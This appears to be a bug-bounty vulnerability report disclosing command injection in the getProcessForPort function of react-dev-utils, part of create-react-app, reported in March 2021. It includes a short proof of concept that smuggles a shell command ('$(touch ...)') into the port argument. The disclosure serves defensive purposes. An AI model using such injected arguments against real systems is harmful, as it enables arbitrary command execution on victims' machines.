Command Injection in facebook/create-react-app
Valid
Reported on
Mar 3rd 2021
description
react-dev-utils includes some utilities used by Create React App.
The function getProcessForPort in react-dev-utils is vulnerable to command injection.
PoC
Create a .js file with the content below and run it, then the file pzhou@shu can be illegally created.
var getProcessForPort = require('react-dev-utils/getProcessForPort');
getProcessForPort('11;$(touch pzhou@shu)');
Occurrences
to join this conversation